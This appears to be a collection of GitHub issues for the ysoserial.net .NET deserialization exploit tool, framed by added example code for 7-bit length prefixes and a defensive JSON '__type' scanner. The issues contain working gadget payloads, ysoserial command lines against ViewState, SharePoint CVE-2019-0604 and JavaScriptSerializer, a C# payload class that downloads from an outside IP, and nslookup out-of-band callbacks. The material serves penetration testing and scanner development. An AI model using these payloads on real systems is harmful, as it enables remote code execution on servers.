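For reference, here is the BinaryWriter.Write7BitEncodedInt layout the issue points at, written out in Python as an added example (it is not the project's Calculate7BitEncodedInt, and the names are this example's own). It assumes the uint32 range that BinaryWriter casts to: seven payload bits per byte, least significant group first, high bit set on every byte but the last, so an encoded value is one to five bytes long. The length-prefixed string helper shows where the prefix matters when a payload is minified: BinaryFormatter and LosFormatter write strings as this prefix followed by the UTF-8 bytes, so a miscounted prefix for a long string corrupts everything after it.

```python
"""7-bit encoded int helpers matching BinaryWriter / BinaryReader. Added example."""
from typing import Tuple

UINT32_MAX = 0xFFFFFFFF


def encode_7bit_int(value: int) -> bytes:
    """BinaryWriter.Write7BitEncodedInt: 7 bits per byte, LSB group first, continuation bit 0x80."""
    if not 0 <= value <= UINT32_MAX:
        raise ValueError("value must fit in an unsigned 32-bit int")
    out = bytearray()
    while value >= 0x80:
        out.append((value & 0x7F) | 0x80)  # more bytes follow
        value >>= 7
    out.append(value)                       # final byte, high bit clear
    return bytes(out)


def encoded_7bit_len(value: int) -> int:
    """Length of encode_7bit_int(value) without building it: 1 byte per 7 bits, max 5."""
    if not 0 <= value <= UINT32_MAX:
        raise ValueError("value must fit in an unsigned 32-bit int")
    n = 1
    while value >= 0x80:
        value >>= 7
        n += 1
    return n


def decode_7bit_int(data: bytes, offset: int = 0) -> Tuple[int, int]:
    """BinaryReader.Read7BitEncodedInt: returns (value, offset after it); rejects > 5 bytes."""
    result, shift = 0, 0
    while True:
        if shift == 5 * 7:
            raise ValueError("7-bit encoded int too long (max 5 bytes)")
        b = data[offset]
        offset += 1
        result |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return result & UINT32_MAX, offset


def encode_length_prefixed_string(s: str) -> bytes:
    """BinaryWriter.Write(string) layout: 7-bit encoded UTF-8 byte length, then the bytes."""
    data = s.encode("utf-8")
    return encode_7bit_int(len(data)) + data


def decode_length_prefixed_string(data: bytes, offset: int = 0) -> Tuple[str, int]:
    """Inverse of encode_length_prefixed_string; returns (string, offset after it)."""
    length, offset = decode_7bit_int(data, offset)
    end = offset + length
    if end > len(data):
        raise ValueError("length prefix runs past the end of the buffer")
    return data[offset:end].decode("utf-8"), end


if __name__ == "__main__":
    for v in (0, 127, 128, 0x4000, 0xFFFFFFFF):
        print(f"{v:>10} -> {encode_7bit_int(v).hex()} ({encoded_7bit_len(v)} bytes)")
    # constructed sample: a string long enough to need a two-byte prefix
    blob = encode_length_prefixed_string("A" * 200)
    print("prefix:", blob[:2].hex(), "decoded:", decode_length_prefixed_string(blob)[0][:8], "...")
```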
I tested debugging the ysoserial.net source code with the options -f BinaryFormatter -o base64 -c 'calc' -g WindowsClaimsIdentity --test
to see if the gadget works.
I always get this error: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.Serialization.SerializationException: ID4282: There was an error deserializing a new 'WindowsClaimsIdentity' instance. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidCastException: Unable to cast object of type 'System.Windows.Data.ObjectDataProvider' to type 'System.Windows.Media.Brush'
To be sure, I have cleaned and rebuilt the project before each run:
However, when I run the built file source\ysoserial\bin\Debug\ysoserial.exe, it works!?
So what does this error mean? And why does deserializing raise the error when debugging the project?
Hello,
I definitely have a situation where an app I am assessing allows a __type declaration, but no matter what I attempt with payloads I get the same response if I include any value for __type. Not looking for help exploiting this for my assessment, just some direction. All of the research I've done shows this should be exploitable. I'd like to know what the next step could be in discovering whether or not this is exploitable, but I hit a wall on the __type null problem. MVC 3.
I have used Freddy, which is certain there is a problem here.
ysoserial.exe -c "nslookup SCRUBBED.burpcollaborator.net" -g ObjectDataProvider -f JavaScriptSerializer
I'm sending this payload to the target and can't get anything to run; it's a Windows box.
The payload that does the detection looks like this (or similar). I can insert null and then I get an error message saying it wants true or false for another parameter, which I've also tried appending, but I still get the error about the type not being null.
{"__type":""}
Error looks like this:
HTTP/1.1 500 Internal Server Error
Date: Mon, 20 Apr 2020 15:49:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9702
Connection: close
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, HEAD
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
The XSLT in the XMLMinifier is removing needed variables for the DataContractSerializer formatter when using the WindowsPrincipal gadget.
This is a reminder for @irsdl to patch the XSLT to give the option of removing the variables or not, and/or only remove the variables if they are not in use.
Hello!
ViewState: I generate a payload encrypted with AES and 3DES, and in the test it cannot be deserialized. The query data is (if the signature algorithm is AES/3DES, no matter whether the encryption function is enabled or not, we just need to sign the data first, encrypt it again, and then sign it again as mentioned earlier. Then send it to the server; ASP.NET enters GetDecodedData(), then EncryptOrDecryptData() first for verification and decryption, and then verifies it again after coming out.) How do I solve this problem? Also, for the lower version V2 / .NET 2.0 ViewState deserialization, how should I use the chain?
Attempted code
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="AES" --validationkey="xxxxxxxxxx"
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="3DES" --validationkey="xxxxxxxxxx"
Hello there,
I'm hoping you can help me out. As noted in the title, this is likely just me not understanding the tool well enough. I'm trying to use the ActivitySurrogateSelectorFromFile formatter, with the ObjectStateFormatter gadget. As noted in the readme, I've provided the .cs file as well as the additional assemblies required.
I am using a modified ExploitClass.cs that does the following:
using System;
//using System.Windows.Forms;
using System.Net;
using System.IO;

namespace ysoserial
{
    class ExploitClass
    {
        public ExploitClass()
        {
            try
            {
                // Payload code to be executed
                //MessageBox.Show("Pwned", "Pwned", MessageBoxButtons.OK, MessageBoxIcon.Error);
                WebClient Client = new WebClient();
                Client.DownloadFile("http://123.123.123.123:9000", Path.GetTempPath() + "\\pwnd.txt");
            }
            catch (Exception)
            {
            }
        }
    }
}
After building the project, and trying to execute it from the .\bin\Debug\
folder I got this error:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug\ExploitClass.cs'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.CSharp.CSharpCodeGenerator.System.CodeDom.Compiler.ICodeCompiler.CompileAssemblyFromFileBatch(CompilerParameters options, String[] fileNames)
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile(CompilerParameters options, String[] fileNames)
at ysoserial.Generators.PayloadClassFromFile..ctor(String file) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 23
at ysoserial.Generators.ActivitySurrogateSelectorFromFileGenerator.Generate(String file, String formatter, Boolean test) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 48
at ysoserial.Program.Main(String[] args) in C:\workspace\bb\ysoserial.net\ysoserial\Program.cs:line 117
Which tells me it (of course) couldn't find ExploitClass.cs in the folder. At first I tried just copying my modified ExploitClass.cs into .\bin\Debug\, but that didn't seem to work:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Metadata file 'System.Net' could not be found
Metadata file 'System.IO' could not be found
I also tried copying the compiled ysoserial.exe into the main project folder and executing from there:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>copy ysoserial.exe ..\..\ysoserial.exe
1 file(s) copied.
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>cd ..\..\
C:\workspace\bb\ysoserial.net\ysoserial>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'NDesk.Options, Version=0.2.1.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
at ysoserial.Program.Main(String[] args)
Any ideas?
Hi,
When the command contains an & character, ysoserial.net generates a broken payload.
I used the following command:
ysoserial --cve=CVE-2019-0604 --command="dir && nslookup xst82rx7czaogsnnk8tuq6gpzg56tv.burpcollaborator.net" -p SharePoint
The payload won't execute on a vulnerable SharePoint. However, if I try nslookup without the &&, the payload will execute.
Hi there,
I have this valid json request
{"IsSafeSearchEnabled":true,"IsSearchMonitorEnabled":true,"IsGoogleHttpsRedirectEnabled":false,"ExcludedEntities":[{"EntityType":0,"Name":"test"}]}
For executing the RCE I used this command:
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
{
    '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'ObjectInstance':{
        '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        'StartInfo': {
            '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            'FileName':'cmd',
            'Arguments':'/c calc'
        }
    }
}
but I'm getting this error; could you say what I did wrong?
[ArgumentNullException: Value cannot be null. Name of parameter: type]
System.Activator.CreateInstance(Type type, Boolean nonPublic) +11110602
System.Activator.CreateInstance(Type type) +66
System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +418
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +66
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +145
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +201
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer) +78
System.Web.Script.Serialization.JavaScriptSerializer.Deserialize(JavaScriptSerializer serializer, String input, Type type, Int32 depthLimit) +44
System.Web.Mvc.JsonValueProviderFactory.GetDeserializedObject(ControllerContext controllerContext) +210
System.Web.Mvc.JsonValueProviderFactory.GetValueProvider(ControllerContext controllerContext) +16
System.Web.Mvc.<>c__DisplayClassc.<GetValueProvider>b__7(ValueProviderFactory factory) +34
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +157
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +183
System.Collections.Generic.List`1..ctor(IEnumerable`1 collection) +460
System.Linq.Enumerable.ToList(IEnumerable`1 source) +58
System.Web.Mvc.ValueProviderFactoryCollection.GetValueProvider(ControllerContext controllerContext) +260
System.Web.Mvc.ControllerBase.get_ValueProvider() +25
System.Web.Mvc.ControllerActionInvoker.GetParameterValue(ControllerContext controllerContext, ParameterDescriptor parameterDescriptor) +62
System.Web.Mvc.ControllerActionInvoker.GetParameterValues(ControllerContext controllerContext, ActionDescriptor actionDescriptor) +105
System.Web.Mvc.Async.<>c__DisplayClass25.<BeginInvokeAction>b__1e(AsyncCallback asyncCallback, Object asyncState) +445
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Async.AsyncControllerActionInvoker.BeginInvokeAction(ControllerContext controllerContext, String actionName, AsyncCallback callback, Object state) +302
System.Web.Mvc.<>c__DisplayClass1d.<BeginExecuteCore>b__17(AsyncCallback asyncCallback, Object asyncState) +30
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecuteCore(AsyncCallback callback, Object state) +338
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +316
System.Web.Mvc.Controller.System.Web.Mvc.Async.IAsyncController.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +15
System.Web.Mvc.<>c__DisplayClass8.<BeginProcessRequest>b__2(AsyncCallback asyncCallback, Object asyncState) +71
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContextBase httpContext, AsyncCallback callback, Object state) +251
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContext httpContext, AsyncCallback callback, Object state) +48
System.Web.Mvc.MvcHandler.System.Web.IHttpAsyncHandler.BeginProcessRequest(HttpContext context, AsyncCallback cb, Object extraData) +16
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +301
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +155
On the server, the deserialization code looks like this:
JavaScriptSerializer jsonSerializer = new JavaScriptSerializer();
System.Collections.Generic.Dictionary<string, string> data = jsonSerializer.Deserialize<System.Collections.Generic.Dictionary<string, string>>(requestBody);
Thank you
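As an added, defender-side example that is not part of this issue or of ysoserial.net: a small scanner that flags "__type" hints in JSON request bodies, using the benign request, the empty probe and the (trimmed, single-quoted) generator output shown above as constructed samples. A JavaScriptSerializer only honours "__type" when it is built with SimpleTypeResolver, so the real mitigation is server-side; this check is for logging and alerting, and the severity labels are an assumption of the example.

```python
import json
import re

# Added example, not from the issue or from ysoserial.net: a defender-side check
# that flags "__type" hints in JSON request bodies. A JavaScriptSerializer only
# honours them when built with SimpleTypeResolver; type names are from the payload above.
HIGH_RISK_TYPES = {"System.Windows.Data.ObjectDataProvider",
                   "System.Diagnostics.Process",
                   "System.Diagnostics.ProcessStartInfo"}

def _parse_loose(body):
    """Strict JSON first, then single quotes swapped for double (ysoserial's raw output)."""
    for candidate in (body, body.replace("'", '"')):
        try:
            return json.loads(candidate)
        except ValueError:
            continue
    return None  # neither form parsed

def _walk(node, path, findings):
    if isinstance(node, dict):
        if "__type" in node:
            raw = node["__type"] if isinstance(node["__type"], str) else ""
            short = raw.split(",")[0].strip()  # drop the assembly qualification
            if short == "":
                level = "medium"  # empty probe such as {"__type":""}
            elif short in HIGH_RISK_TYPES:
                level = "high"
            else:
                level = "low"  # any server-type hint from a client is suspect
            findings.append((path, short, level))
        for key, child in node.items():
            _walk(child, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            _walk(child, f"{path}[{i}]", findings)

def scan_json_body(body):
    """Return (json_path, type_name, severity) for every __type hint, in
    document order; an unparseable body still gets a textual check."""
    findings = []
    data = _parse_loose(body)
    if data is None:
        if re.search(r"[\"']__type[\"']\s*:", body):
            findings.append(("$", "<unparsed>", "medium"))
        return findings
    _walk(data, "$", findings)
    return findings

# Constructed samples: the benign request and probe from the issue, and the
# generator's single-quoted output shape as quoted above (trimmed).
BENIGN = '{"IsSafeSearchEnabled":true,"ExcludedEntities":[{"EntityType":0,"Name":"test"}]}'
PROBE = '{"__type":""}'
GADGET = ("{'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework',"
          "'MethodName':'Start','ObjectInstance':{'__type':'System.Diagnostics.Process, System',"
          "'StartInfo':{'__type':'System.Diagnostics.ProcessStartInfo, System','FileName':'cmd'}}}")
```

Running scan_json_body over a request log will also surface bodies that fail to parse but still carry a __type key, which is the case the textual fallback covers.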
Please, I am trying to build the v2 branch for an old ASP.NET server I came across.
Please help with a guide on how to build.
Powershell on Debian Linux
Unhandled Exception:
System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
I see that README.md lists:
RolePrincipal
DataSet
ClaimsIdentity
but when I run "ysoserial.exe -h" it does not show the above gadgets, so I need some help. Thank you.
I've noticed that the class here is not referenced inside the VS project. I tried to import it, and when compiling it gives me errors:
error CS0117: 'Comparer' does not contain a definition for 'Create'
error CS0246: The type or namespace name 'SortedSet<>' could not be found (are you missing a using directive or an assembly reference?)
I've noticed that the class SortedSet is not present in .NET 2.0, and neither is Comparer.Create.
Since this gadget should be smaller than ActivitySurrogateSelector, I'd like to compile and use it.
Is this class left out of the project on purpose? Is there a way to compile it and use it on .NET 2.0 targets?
There is no ysoserial.exe file present in this tool; I didn't find this file anywhere. How can I run this tool?
Precompiled or Build Dependency guide
Hey all, 2 questions really:
Is there a binary?
I've installed Visual Studio 2019. While I could list the dependencies it's erroring on during the build phase, I have to ask: is there a dependency/build guide that I've ignored/overlooked?
I've been working on implementing an insecure deserialization plugin for w3af https://github.com/andresriancho/w3af/blob/feature/deserialization/w3af/plugins/audit/deserialization.py . For now it is working with python, nodejs and java.
I'm trying to use ysoserial.net to generate the payloads which would be sent during an application scan. Something that worries me is the large number of payloads which can be generated using ysoserial.net
A dummy approach would be to generate all the possible payloads using all (gadget, formatter) combinations and send them all. That would (potentially) yield the highest test coverage, but will also take more time to send all the HTTP requests.
In order to reduce the number of HTTP requests to be sent, I would like to understand why (Gadget: ObjectDataProvider, Formatter: Json.net) would work and (Gadget: WindowsIdentity, Formatter: Json.net) would not. I'm sending the payloads to all parameters, sending them as-is and base64 encoded, sending them in the query string, post data and cookies.
Any other pointers on writing a black-box scanner for insecure .net deserialization?
This issue is related to #6
Can you upload some binary releases, preferably targeting .NET 2.X?
Are there any gadgets out there for Mono? I'd be willing to implement them but I can't find any research into attacking deserialization on Mono, or Unity for that matter. Target platform is Windows.